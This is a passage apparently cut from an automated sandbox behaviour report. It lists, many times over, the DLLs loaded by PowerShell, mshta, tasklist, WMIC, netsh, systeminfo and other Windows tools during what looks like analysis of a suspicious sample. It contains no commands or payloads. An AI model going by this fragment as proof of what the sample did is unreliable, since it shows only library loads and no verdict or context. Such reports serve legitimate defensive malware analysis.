              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
